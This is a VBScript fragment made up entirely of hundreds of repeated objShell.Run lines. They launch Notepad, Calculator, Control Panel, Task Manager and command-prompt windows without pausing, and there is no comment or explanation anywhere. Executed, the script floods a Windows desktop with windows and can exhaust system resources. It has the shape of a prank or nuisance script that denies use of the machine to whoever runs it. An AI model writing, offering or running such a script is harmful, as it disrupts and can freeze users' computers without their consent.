objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
